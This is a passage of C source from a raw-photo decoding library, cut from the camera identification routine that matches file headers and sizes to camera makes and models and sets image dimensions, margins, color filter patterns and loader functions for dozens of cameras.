raw_height = get2();
load_raw = &CLASS nokia_load_raw;
filters = 0x61616161;
} else if (!memcmp (head,"NOKIARAW",8)) {
strcpy (make, "NOKIA");
order = 0x4949;
fseek (ifp, 300, SEEK_SET);
data_offset = get4();
i = get4();
width = get2();
height = get2();
#ifdef LIBRAW_LIBRARY_BUILD
// data length should be in range w*h..w*h*2
if(width*height < (LIBRAW_MAX_ALLOC_MB*1024*512L) && width*height>1
&& i >= width * height && i <= width*height*2)
{
#endif
switch (tiff_bps = i*8 / (width * height)) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 10: load_raw = &CLASS nokia_load_raw;
}
raw_height = height + (top_margin = i / (width * tiff_bps/8) - height);
mask[0][3] = 1;
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
}
else
is_raw = 0;
#endif
} else if (!memcmp (head,"ARRI",4)) {
order = 0x4949;
fseek (ifp, 20, SEEK_SET);
width = get4();
height = get4();
strcpy (make, "ARRI");
fseek (ifp, 668, SEEK_SET);
fread (model, 1, 64, ifp);
data_offset = 4096;
load_raw = &CLASS packed_load_raw;
load_flags = 88;
filters = 0x61616161;
} else if (!memcmp (head,"XPDS",4)) {
order = 0x4949;
fseek (ifp, 0x800, SEEK_SET);
fread (make, 1, 41, ifp);
raw_height = get2();
raw_width = get2();
fseek (ifp, 56, SEEK_CUR);
fread (model, 1, 30, ifp);
data_offset = 0x10000;
load_raw = &CLASS canon_rmf_load_raw;
gamma_curve (0, 12.25, 1, 1023);
} else if (!memcmp (head+4,"RED1",4)) {
strcpy (make, "Red");
strcpy (model,"One");
parse_redcine();
load_raw = &CLASS redcine_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
filters = 0x49494949;
} else if (!memcmp (head,"DSC-Image",9))
parse_rollei();
else if (!memcmp (head,"PWAD",4))
parse_sinar_ia();
else if (!memcmp (head,"\0MRM",4))
parse_minolta(0);
else if (!memcmp (head,"FOVb",4))
{
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
parse_foveon();
else
#endif
parse_x3f();
#else
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
parse_foveon();
#endif
#endif
}
else if (!memcmp (head,"CI",2))
parse_cine();
if(make[0] == 0)
#ifdef LIBRAW_LIBRARY_BUILD
for (zero_fsize=i=0; i < camera_count; i++)
#else
for (zero_fsize=i=0; i < sizeof table / sizeof *table; i++)
#endif
if (fsize == table[i].fsize) {
strcpy (make, table[i].t_make );
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make, "Canon",5))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
#endif
strcpy (model, table[i].t_model);
flip = table[i].flags >> 2;
zero_is_bad = table[i].flags & 2;
if (table[i].flags & 1)
parse_external_jpeg();
data_offset = table[i].offset == 0xffff?0:table[i].offset;
raw_width = table[i].rw;
raw_height = table[i].rh;
left_margin = table[i].lm;
top_margin = table[i].tm;
width = raw_width - left_margin - table[i].rm;
height = raw_height - top_margin - table[i].bm;
filters = 0x1010101 * table[i].cf;
colors = 4 - !((filters & filters >> 1) & 0x5555);
load_flags = table[i].lf;
switch (tiff_bps = (fsize-data_offset)*8 / (raw_width*raw_height)) {
case 6:
load_raw = &CLASS minolta_rd175_load_raw; break;
case 8:
load_raw = &CLASS eight_bit_load_raw; break;
case 10:
if ((fsize-data_offset)/raw_height*3 >= raw_width*4) {
load_raw = &CLASS android_loose_load_raw; break;
} else if (load_flags & 1) {
load_raw = &CLASS android_tight_load_raw; break;
}
case 12:
load_flags |= 128;
load_raw = &CLASS packed_load_raw; break;
case 16:
order = 0x4949 | 0x404 * (load_flags & 1);
tiff_bps -= load_flags >> 4;
tiff_bps -= load_flags = load_flags >> 1 & 7;
load_raw = table[i].offset == 0xffff ? &CLASS unpacked_load_raw_reversed : &CLASS unpacked_load_raw;
}
maximum = (1 << tiff_bps) - (1 << table[i].max);
}
if (zero_fsize) fsize = 0;
if (make[0] == 0) parse_smal (0, flen);
if (make[0] == 0) {
parse_jpeg(0);
fseek(ifp,0,SEEK_END);
int sz = ftell(ifp);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(model,"RP_imx219",9) && sz >= 0x9cb600 &&
!fseek (ifp, -0x9cb600, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
strcpy (model, "RPi IMX219");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 66;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x9cb600 - 1;
} else
if (!(strncmp(model,"ov5647",6) && strncmp(model,"RP_OV5647",9)) && sz >= 0x61b800 &&
!fseek (ifp, -0x61b800, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
if (!strncmp(model,"ov5647",6))
strcpy (model, "RPi OV5647 v.1");
else
strcpy (model, "RPi OV5647 v.2");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 16;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x61b800 - 1;
#else
if (!(strncmp(model,"ov",2) && strncmp(model,"RP_OV",5)) && sz>=6404096 &&
!fseek (ifp, -6404096, SEEK_END) &&
fread (head, 1, 32, ifp) && !strcmp(head,"BRCMn")) {
strcpy (make, "OmniVision");
data_offset = ftell(ifp) + 0x8000-32;
width = raw_width;
raw_width = 2611;
load_raw = &CLASS nokia_load_raw;
filters = 0x16161616;
#endif
} else is_raw = 0;
}
#ifdef LIBRAW_LIBRARY_BUILD
// make sure strings are terminated
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
#endif
for (i=0; i < sizeof corp / sizeof *corp; i++)
if (strcasestr (make, corp[i])) /* Simplify company names */
strcpy (make, corp[i]);
if ((!strncmp(make,"Kodak",5) || !strncmp(make,"Leica",5)) &&
((cp = strcasestr(model," DIGITAL CAMERA")) ||
(cp = strstr(model,"FILE VERSION"))))
*cp = 0;
if (!strncasecmp(model,"PENTAX",6))
strcpy (make, "Pentax");
#ifdef LIBRAW_LIBRARY_BUILD
remove_trailing_spaces(make,sizeof(make));
remove_trailing_spaces(model,sizeof(model));
#else
cp = make + strlen(make); /* Remove trailing spaces */
while (*--cp == ' ') *cp = 0;
cp = model + strlen(model);
while (*--cp == ' ') *cp = 0;
#endif
i = strbuflen(make); /* Remove make from model */
if (!strncasecmp (model, make, i) && model[i++] == ' ')
memmove (model, model+i, 64-i);
if (!strncmp (model,"FinePix ",8))
strcpy (model, model+8);
if (!strncmp (model,"Digital Camera ",15))
strcpy (model, model+15);
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
if (!is_raw) goto notraw;
if (!height) height = raw_height;
if (!width) width = raw_width;
if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
{ height = 2616; width = 3896; }
if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */
{ height = 3124; width = 4688; filters = 0x16161616; }
if (width == 4352 && (!strcmp(model,"K-r") || !strcmp(model,"K-x")))
{ width = 4309; filters = 0x16161616; }
if (width >= 4960 && !strncmp(model,"K-5",3))
{ left_margin = 10; width = 4950; filters = 0x16161616; }
if (width == 6080 && !strcmp(model,"K-70"))
{ height = 4016; top_margin=32; width=6020; left_margin = 60; }
if (width == 4736 && !strcmp(model,"K-7"))
{ height = 3122; width = 4684; filters = 0x16161616; top_margin = 2; }
if (width == 6080 && !strcmp(model,"K-3 II")) /* moved back */
{ left_margin = 4; width = 6040; }
if (width == 6080 && !strcmp(model,"K-3"))
{ left_margin = 4; width = 6040; }
if (width == 7424 && !strcmp(model,"645D"))
{ height = 5502; width = 7328; filters = 0x61616161; top_margin = 29;
left_margin = 48; }
if (height == 3014 && width == 4096) /* Ricoh GX200 */
width = 4014;
if (dng_version) {
if (filters == UINT_MAX) filters = 0;
if (filters) is_raw *= tiff_samples;
else colors = tiff_samples;
switch (tiff_compress) {
case 0: /* Compression not set, assuming uncompressed */
case 1: load_raw = &CLASS packed_dng_load_raw; break;
case 7: load_raw = &CLASS lossless_dng_load_raw; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: load_raw = &CLASS deflate_dng_load_raw; break;
#endif
case 34892: load_raw = &CLASS lossy_dng_load_raw; break;
default: load_raw = 0;
}
if (!strncmp(make, "Canon",5) && unique_id)
{
for (i = 0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
strcpy(model, unique[i].t_model);
break;
}
}
if (!strncasecmp(make, "Sony",4) && unique_id)
{
for (i = 0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
strcpy(model, sonique[i].t_model);
break;
}
}
goto dng_skip;
}
if (!strncmp(make,"Canon",5) && !fsize && tiff_bps != 15) {
if (!load_raw)
load_raw = &CLASS lossless_jpeg_load_raw;
for (i=0; i < sizeof canon / sizeof *canon; i++)
if (raw_width == canon[i][0] && raw_height == canon[i][1]) {
width = raw_width - (left_margin = canon[i][2]);
height = raw_height - (top_margin = canon[i][3]);
width -= canon[i][4];
height -= canon[i][5];
mask[0][1] = canon[i][6];
mask[0][3] = -canon[i][7];
mask[1][1] = canon[i][8];
mask[1][3] = -canon[i][9];
if (canon[i][10]) filters = canon[i][10] * 0x01010101;
}
if ((unique_id | 0x20000) == 0x2720000) {
left_margin = 8;
top_margin = 16;
}
}
if (!strncmp(make,"Canon",5) && unique_id)
{
for (i=0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
adobe_coeff ("Canon", unique[i].t_model);
strcpy(model,unique[i].t_model);
}
}
if (!strncasecmp(make,"Sony",4) && unique_id)
{
for (i=0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
adobe_coeff ("Sony", sonique[i].t_model);
strcpy(model,sonique[i].t_model);
}
}
if (!strncmp(make,"Nikon",5)) {
if (!load_raw)
load_raw = &CLASS packed_load_raw;
if (model[0] == 'E')
load_flags |= !data_offset << 2 | 2;
}
/* Set parameters based on camera name (for non-DNG files). */
if (!strcmp(model,"KAI-0340")
&& find_green (16, 16, 3840, 5120) < 25) {
height = 480;
top_margin = filters = 0;
strcpy (model,"C603");
}
if (!strcmp(make, "Sony") && raw_width > 3888 && !black && !cblack[0])
black = 128 << (tiff_bps - 12);
if (is_foveon) {
if (height*2 < width) pixel_aspect = 0.5;
if (height > width) pixel_aspect = 2;
filters = 0;
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
simple_coeff(0);
#endif
}
else if(!strncmp(make,"Pentax",6))
{
if(!strncmp(model,"K-1",3))
{
top_margin = 18;
height = raw_height - top_margin;
if(raw_width == 7392)
{
left_margin = 6;
width = 7376;
}
}
}
else if (!strncmp(make,"Canon",5) && tiff_bps == 15) {
switch (width) {
case 3344: width -= 66;
case 3872: width -= 6;
}
if (height > width) {
SWAP(height,width);
SWAP(raw_height,raw_width);
}
if (width == 7200 && height == 3888)
{
raw_width = width = 6480;
raw_height = height = 4320;
}
filters = 0;
tiff_samples = colors = 3;
load_raw = &CLASS canon_sraw_load_raw;
} else if (!strcmp(model,"PowerShot 600")) {
height = 613;
width = 854;
raw_width = 896;
colors = 4;
filters = 0xe1e4e1e4;
load_raw = &CLASS canon_600_load_raw;
} else if (!strcmp(model,"PowerShot A5") ||
!strcmp(model,"PowerShot A5 Zoom")) {
height = 773;
width = 960;
raw_width = 992;
pixel_aspect = 256/235.0;
filters = 0x1e4e1e4e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot A50")) {
height = 968;
width = 1290;
raw_width = 1320;
filters = 0x1b4e4b1e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot Pro70")) {
height = 1024;
width = 1552;
filters = 0x1e4b4e1b;
canon_a5:
colors = 4;
tiff_bps = 10;
load_raw = &CLASS packed_load_raw;
load_flags = 40;
} else if (!strcmp(model,"PowerShot Pro90 IS") ||
!strcmp(model,"PowerShot G1")) {
colors = 4;
filters = 0xb4b4b4b4;
} else if (!strcmp(model,"PowerShot A610")) {
if (canon_s2is()) strcpy (model+10, "S2 IS");
} else if (!strcmp(model,"PowerShot SX220 HS")) {
mask[1][3] = -4;
top_margin=16;
left_margin = 92;
} else if (!strcmp(model,"PowerShot S120")) {
raw_width = 4192;
raw_height = 3062;
width = 4022;
height = 3016;
mask[0][0] = top_margin = 31;
mask[0][2] = top_margin + height;
left_margin = 120;
mask[0][1] = 23;
mask[0][3] = 72;
} else if (!strcmp(model,"PowerShot G16")) {
mask[0][0] = 0;
mask[0][2] = 80;
mask[0][1] = 0;
mask[0][3] = 16;
top_margin = 29;
left_margin = 120;
width = raw_width-left_margin-48;
height = raw_height-top_margin-14;
} else if (!strcmp(model,"PowerShot SX50 HS")) {
top_margin = 17;
} else if (!strcmp(model,"EOS D2000C")) {
filters = 0x61616161;
black = curve[200];
} else if (!strcmp(model,"D1")) {
cam_mul[0] *= 256/527.0;
cam_mul[2] *= 256/317.0;
} else if (!strcmp(model,"D1X")) {
width -= 4;
pixel_aspect = 0.5;
} else if (!strcmp(model,"D40X") ||
!strcmp(model,"D60") ||
!strcmp(model,"D80") ||
!strcmp(model,"D3000")) {
height -= 3;
width -= 4;
} else if (!strcmp(model,"D3") ||
!strcmp(model,"D3S") ||
!strcmp(model,"D700")) {
width -= 4;
left_margin = 2;
} else if (!strcmp(model,"D3100")) {
width -= 28;
left_margin = 6;
} else if (!strcmp(model,"D5000") ||
!strcmp(model,"D90")) {
width -= 42;
} else if (!strcmp(model,"D5100") ||
!strcmp(model,"D7000") ||
!strcmp(model,"COOLPIX A")) {
width -= 44;
} else if (!strcmp(model,"D3200") ||
!strncmp(model,"D6",2) ||
!strncmp(model,"D800",4)) {
width -= 46;
} else if (!strcmp(model,"D4") ||
!strcmp(model,"Df")) {
width -= 52;
left_margin = 2;
} else if (!strncmp(model,"D40",3) ||
!strncmp(model,"D50",3) ||
!strncmp(model,"D70",3)) {
width--;
} else if (!strcmp(model,"D100")) {
if (load_flags)
raw_width = (width += 3) + 3;
} else if (!strcmp(model,"D200")) {
left_margin = 1;
width -= 4;
filters = 0x94949494;
} else if (!strncmp(model,"D2H",3)) {
left_margin = 6;
width -= 14;
} else if (!strncmp(model,"D2X",3)) {
if (width == 3264) width -= 32;
else width -= 8;
} else if (!strncmp(model,"D300",4)) {
width -= 32;
} else if (!strncmp(make,"Nikon",5) && raw_width == 4032) {
if(!strcmp(model,"COOLPIX P7700"))
{
adobe_coeff ("Nikon","COOLPIX P7700");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P7800"))
{
adobe_coeff ("Nikon","COOLPIX P7800");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P340"))
load_flags=0;
} else if (!strncmp(model,"COOLPIX P",9) && raw_width != 4032) {
load_flags = 24;
filters = 0x94949494;
if (model[9] == '7' && (iso_speed >= 400 || iso_speed==0) && !strstr(software,"V1.2") )
black = 255;
} else if (!strncmp(model,"1 ",2)) {
height -= 2;
} else if (fsize == 1581060) {
simple_coeff(3);
pre_mul[0] = 1.2085;
pre_mul[1] = 1.0943;
pre_mul[3] = 1.1103;
} else if (fsize == 3178560) {
cam_mul[0] *= 4;
cam_mul[2] *= 4;
} else if (fsize == 4771840) {
if (!timestamp && nikon_e995())
strcpy (model, "E995");
if (strcmp(model,"E995")) {
filters = 0xb4b4b4b4;
simple_coeff(3);
pre_mul[0] = 1.196;
pre_mul[1] = 1.246;
pre_mul[2] = 1.018;
}
} else if (fsize == 2940928) {
if (!timestamp && !nikon_e2100())
strcpy (model,"E2500");
if (!strcmp(model,"E2500")) {
height -= 2;
load_flags = 6;
colors = 4;
filters = 0x4b4b4b4b;
}
} else if (fsize == 4775936) {
if (!timestamp) nikon_3700();
if (model[0] == 'E' && atoi(model+1) < 3700)
filters = 0x49494949;
if (!strcmp(model,"Optio 33WR")) {
flip = 1;
filters = 0x16161616;
}
if (make[0] == 'O') {
i = find_green (12, 32, 1188864, 3576832);
c = find_green (12, 32, 2383920, 2387016);
if (abs(i) < abs(c)) {
SWAP(i,c);
load_flags = 24;
}
if (i < 0) filters = 0x61616161;
}
} else if (fsize == 5869568) {
if (!timestamp && minolta_z2()) {
strcpy (make, "Minolta");
strcpy (model,"DiMAGE Z2");
}
load_flags = 6 + 24*(make[0] == 'M');
} else if (fsize == 6291456) {
fseek (ifp, 0x300000, SEEK_SET);
if ((order = guess_byte_order(0x10000)) == 0x4d4d) {
height -= (top_margin = 16);
width -= (left_margin = 28);
maximum = 0xf5c0;
strcpy (make, "ISG");
model[0] = 0;
}
} else if (!strncmp(make,"Fujifilm",8)) {
if (!strcmp(model+7,"S2Pro")) {
strcpy (model,"S2Pro");
height = 2144;
width = 2880;
flip = 6;
} else if (load_raw != &CLASS packed_load_raw)
maximum = (is_raw == 2 && shot_select) ? 0x2f00 : 0x3e00;
top_margin = (raw_height - height) >> 2 << 1;
left_margin = (raw_width - width ) >> 2 << 1;
if (width == 2848 || width == 3664) filters = 0x16161616;
if (width == 4032 || width == 4952) left_margin = 0;
if (width == 3328 && (width -= 66)) left_margin = 34;
if (width == 4936) left_margin = 4;
if (width == 6032) left_margin = 0;
if (!strcmp(model,"HS50EXR") ||
!strcmp(model,"F900EXR")) {
width += 2;
left_margin = 0;
filters = 0x16161616;
}
if(!strcmp(model,"S5500"))
{
height -= (top_margin=6);
}
if (fuji_layout) raw_width *= is_raw;
if (filters == 9)
FORC(36) ((char *)xtrans)[c] =
xtrans_abs[(c/6+top_margin) % 6][(c+left_margin) % 6];
} else if (!strcmp(model,"KD-400Z")) {
height = 1712;
width = 2312;
raw_width = 2336;
goto konica_400z;
} else if (!strcmp(model,"KD-510Z")) {
goto konica_510z;
} else if (!strncasecmp(make,"Minolta",7)) {
if (!load_raw && (maximum = 0xfff))
load_raw = &CLASS unpacked_load_raw;
if (!strncmp(model,"DiMAGE A",8)) {
if (!strcmp(model,"DiMAGE A200"))
filters = 0x49494949;
tiff_bps = 12;
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"ALPHA",5) ||
!strncmp(model,"DYNAX",5) ||
!strncmp(model,"MAXXUM",6)) {
sprintf (model+20, "DYNAX %-10s", model+6+(model[0]=='M'));
adobe_coeff (make, model+20);
load_raw = &CLASS packed_load_raw;
} else if (!strncmp(model,"DiMAGE G",8)) {
if (model[8] == '4') {
height = 1716;
width = 2304;
} else if (model[8] == '5') {
konica_510z:
height = 1956;
width = 2607;
raw_width = 2624;
} else if (model[8] == '6') {
height = 2136;
width = 2848;
}
data_offset += 14;
filters = 0x61616161;
konica_400z:
load_raw = &CLASS unpacked_load_raw;
maximum = 0x3df;
order = 0x4d4d;
}
} else if (!strcmp(model,"*ist D")) {
load_raw = &CLASS unpacked_load_raw;
data_error = -1;
} else if (!strcmp(model,"*ist DS")) {
height -= 2;
} else if (!strncmp(make,"Samsung",7) && raw_width == 4704) {
height -= top_margin = 8;
width -= 2 * (left_margin = 8);
load_flags = 32;
} else if (!strncmp(make,"Samsung",7) && !strcmp(model,"NX3000")) {
top_margin = 24;
left_margin = 64;
width = 5472;
height = 3648;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_height == 3714) {
height -= top_margin = 18;
left_margin = raw_width - (width = 5536);
if (raw_width != 5600)
left_margin = top_margin = 0;
filters = 0x61616161;
colors = 3;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5632) {
order = 0x4949;
height = 3694;
top_margin = 2;
width = 5574 - (left_margin = 32 + tiff_bps);
if (tiff_bps == 12) load_flags = 80;
} else if (!strncmp(make,"Samsung",7) && raw_width == 5664) {
height -= top_margin = 17;
left_margin = 96;
width = 5544;
filters = 0x49494949;
} else if (!strncmp(make,"Samsung",7) && raw_width == 6496) {
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
if(!black && !cblack[0] && !cblack[1] && !cblack[2] && !cblack[3])
#endif
black = 1 << (tiff_bps - 7);
} else if (!strcmp(model,"EX1")) {
order = 0x4949;
height -= 20;
top_margin = 2;
if ((width -= 6) > 3682) {
height -= 10;
width -= 46;
top_margin = 8;
}
} else if (!strcmp(model,"WB2000")) {
order = 0x4949;
height -= 3;
top_margin = 2;
if ((width -= 10) > 3718) {
height -= 28;
width -= 56;
top_margin = 8;
}
} else if (strstr(model,"WB550")) {
strcpy (model, "WB550");
} else if (!strcmp(model,"EX2F")) {
height = 3030;
width = 4040;
top_margin = 15;
left_margin=24;
order = 0x4949;
filters = 0x49494949;
load_raw = &CLASS unpacked_load_raw;
} else if (!strcmp(model,"STV680 VGA")) {
black = 16;
} else if (!strcmp(model,"N95")) {
height = raw_height - (top_margin = 2);
} else if (!strcmp(model,"640x480")) {
gamma_curve (0.45, 4.5, 1, 255);
} else if (!strncmp(make,"Hasselblad",10)) {
if (load_raw == &CLASS lossless_jpeg_load_raw)
load_raw = &CLASS hasselblad_load_raw;
if (raw_width == 7262) {
height = 5444;
width = 7248;
top_margin = 4;
left_margin = 7;
filters = 0x61616161;
if(!strncasecmp(model,"H3D",3))
{
adobe_coeff("Hasselblad","H3DII-39");
strcpy(model,"H3DII-39");
}
} else if (raw_width == 7410 || raw_width == 8282) {
height -= 84;
width -= 82;
top_margin = 4;
left_margin = 41;
filters = 0x61616161;
adobe_coeff("Hasselblad","H4D-40");
strcpy(model,"H4D-40");
}
else if( raw_width == 8384) // X1D
{
top_margin = 96;
height -= 96;
left_margin = 48;
width -= 106;
adobe_coeff("Hasselblad","X1D");
}
else if (raw_width == 9044) {
if(black > 500)
{
top_margin = 12;
left_margin = 44;
width = 8956;
height = 6708;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H4D-60");
strcpy(model,"H4D-60");
black = 512;
}
else
{
height = 6716;
width = 8964;
top_margin = 8;
left_margin = 40;
black += load_flags = 256;
maximum = 0x8101;
strcpy(model,"H3DII-60");
}
} else if (raw_width == 4090) {
strcpy (model, "V96C");
height -= (top_margin = 6);
width -= (left_margin = 3) + 7;
filters = 0x61616161;
} else if (raw_width == 8282 && raw_height == 6240) {
if(!strncasecmp(model,"H5D",3))
{
/* H5D 50*/
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
black = 256;
strcpy(model,"H5D-50");
}
else if(!strncasecmp(model,"H3D",3))
{
black=0;
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H3D-50");
strcpy(model,"H3D-50");
}
} else if (raw_width == 8374 && raw_height == 6304) {
/* H5D 50c*/
left_margin = 52;
top_margin = 100;
width = 8272;
height = 6200;
black = 256;
strcpy(model,"H5D-50c");
}
if (tiff_samples > 1) {
is_raw = tiff_samples+1;
if (!shot_select && !half_size) filters = 0;
}
} else if (!strncmp(make,"Sinar",5)) {
if (!load_raw) load_raw = &CLASS unpacked_load_raw;
if (is_raw > 1 && !shot_select && !half_size) filters = 0;
maximum = 0x3fff;
} else if (!strncmp(make,"Leaf",4)) {
maximum = 0x3fff;
fseek (ifp, data_offset, SEEK_SET);
if (ljpeg_start (&jh, 1) && jh.bits == 15)
maximum = 0x1fff;
if (tiff_samples > 1) filters = 0;
if (tiff_samples > 1 || tile_length < raw_height) {
load_raw = &CLASS leaf_hdr_load_raw;
raw_width = tile_width;
}
if ((width | height) == 2048) {
if (tiff_samples == 1) {
filters = 1;
strcpy (cdesc, "RBTG");
strcpy (model, "CatchLight");
top_margin = 8; left_margin = 18; height = 2032; width = 2016;
} else {
strcpy (model, "DCB2");
top_margin = 10; left_margin = 16; height = 2028; width = 2022;
}
} else if (width+height == 3144+2060) {
if (!model[0]) strcpy (model, "Cantare");
if (width > height) {
top_margin = 6; left_margin = 32; height = 2048; width = 3072;
filters = 0x61616161;
} else {
left_margin = 6; top_margin = 32; width = 2048; height = 3072;
filters = 0x16161616;
}
if (!cam_mul[0] || model[0] == 'V') filters = 0;
else is_raw = tiff_samples;
} else if (width == 2116) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 30);
width -= 2 * (left_margin = 55);
filters = 0x49494949;
} else if (width == 3171) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 24);
width -= 2 * (left_margin = 24);
filters = 0x16161616;
}
} else if (!strncmp(make,"Leica",5) || !strncmp(make,"Panasonic",9)
|| !strncasecmp(make,"YUNEEC",6)) {
if (raw_width > 0&& ((flen - data_offset) / (raw_width*8/7) == raw_height) )
load_raw = &CLASS panasonic_load_raw;
if (!load_raw) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
}
zero_is_bad = 1;
if ((height += 12) > raw_height) height = raw_height;
for (i=0; i < sizeof pana / sizeof *pana; i++)
if (raw_width == pana[i][0] && raw_height == pana[i][1]) {
left_margin = pana[i][2];
top_margin = pana[i][3];
width += pana[i][4];
height += pana[i][5];
}
filters = 0x01010101 * (uchar) "\x94\x61\x49\x16"
[((filters-1) ^ (left_margin & 1) ^ (top_margin << 1)) & 3];
} else if (!strcmp(model,"C770UZ")) {
height = 1718;
width = 2304;
filters = 0x16161616;
load_raw = &CLASS packed_load_raw;
load_flags = 30;
} else if (!strncmp(make,"Olympus",7)) {
height += height & 1;
if (exif_cfa) filters = exif_cfa;
if (width == 4100) width -= 4;
if (width == 4080) width -= 24;
if (width == 9280) { width -= 6; height -= 6; }
if (load_raw == &CLASS unpacked_load_raw)
load_flags = 4;
tiff_bps = 12;
if (!strcmp(model,"E-300") ||
!strcmp(model,"E-500")) {
width -= 20;
if (load_raw == &CLASS unpacked_load_raw) {
maximum = 0xfc3;
memset (cblack, 0, sizeof cblack);
}
} else if (!strcmp(model,"STYLUS1")) {
width -= 14;
maximum = 0xfff;
} else if (!strcmp(model,"E-330")) {
width -= 30;
if (load_raw == &CLASS unpacked_load_raw)
maximum = 0xf79;
} else if (!strcmp(model,"SP550UZ")) {
thumb_length = flen - (thumb_offset = 0xa39800);
thumb_height = 480;
thumb_width = 640;
} else if (!strcmp(model,"TG-4")) {
width -= 16;
}
} else if (!strcmp(model,"N Digital")) {
height = 2047;
width = 3072;
filters = 0x61616161;
data_offset = 0x1a00;
load_raw = &CLASS packed_load_raw;
} else if (!strcmp(model,"DSC-F828")) {
width = 3288;
left_margin = 5;
mask[1][3] = -17;
data_offset = 862144;
load_raw = &CLASS sony_load_raw;
filters = 0x9c9c9c9c;
colors = 4;
strcpy (cdesc, "RGBE");
} else if (!strcmp(model,"DSC-V3")) {
width = 3109;
left_margin = 59;
mask[0][1] = 9;
data_offset = 787392;
load_raw = &CLASS sony_load_raw;
} else if (!strncmp(make,"Sony",4) && raw_width == 3984) {
width = 3925;
order = 0x4d4d;
} else if (!strncmp(make,"Sony",4) && raw_width == 4288) {
width -= 32;
} else if (!strcmp(make, "Sony") && raw_width == 4600) {
if (!strcmp(model, "DSLR-A350"))
height -= 4;
black = 0;
} else if (!strncmp(make,"Sony",4) && raw_width == 4928) {
if (height < 3280) width -= 8;
} else if (!strncmp(make,"Sony",4) && raw_width == 5504) { // ILCE-3000//5000
width -= height > 3664 ? 8 : 32;
} else if (!strncmp(make,"Sony",4) && raw_width == 6048) {
width -= 24;
if (strstr(model,"RX1") || strstr(model,"A99"))
width -= 6;
} else if (!strncmp(make,"Sony",4) && raw_width == 7392) {
width -= 30;
} else if (!strncmp(make,"Sony",4) && raw_width == 8000) {
width -= 32;
if (!strncmp(model, "DSC", 3)) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
}
} else if (!strcmp(model,"DSLR-A100")) {
if (width == 3880) {
height--;
width = ++raw_width;
} else {
height -= 4;
width -= 4;
order = 0x4d4d;
load_flags = 2;
}
filters = 0x61616161;
} else if (!strcmp(model,"PIXL")) {
height -= top_margin = 4;
width -= left_margin = 32;
gamma_curve (0, 7, 1, 255);
} else if (!strcmp(model,"C603") || !strcmp(model,"C330")
|| !strcmp(model,"12MP")) {
order = 0x4949;
if (filters && data_offset) {
fseek (ifp, data_offset < 4096 ? 168 : 5252, SEEK_SET);
read_shorts (curve, 256);
} else gamma_curve (0, 3.875, 1, 255);
load_raw = filters ? &CLASS eight_bit_load_raw :
strcmp(model,"C330") ? &CLASS kodak_c603_load_raw :
&CLASS kodak_c330_load_raw;
load_flags = tiff_bps > 16;
tiff_bps = 8;
} else if (!strncasecmp(model,"EasyShare",9)) {
data_offset = data_offset < 0x15000 ? 0x15000 : 0x17000;
load_raw = &CLASS packed_load_raw;
} else if (!strncasecmp(make,"Kodak",5)) {
if (filters == UINT_MAX) filters = 0x61616161;
if (!strncmp(model,"NC2000",6) ||
!strncmp(model,"EOSDCS",6) ||
!strncmp(model,"DCS4",4)) {
width -= 4;
left_margin = 2;
if (model[6] == ' ') model[6] = 0;
if (!strcmp(model,"DCS460A")) goto bw;
} else if (!strcmp(model,"DCS660M")) {
black = 214;
goto bw;
} else if (!strcmp(model,"DCS760M")) {
bw: colors = 1;
filters = 0;
}
if (!strcmp(model+4,"20X"))
strcpy (cdesc, "MYCY");
if (strstr(model,"DC25")) {
strcpy (model, "DC25");
data_offset = 15424;
}
if (!strncmp(model,"DC2",3)) {
raw_height = 2 + (height = 242);
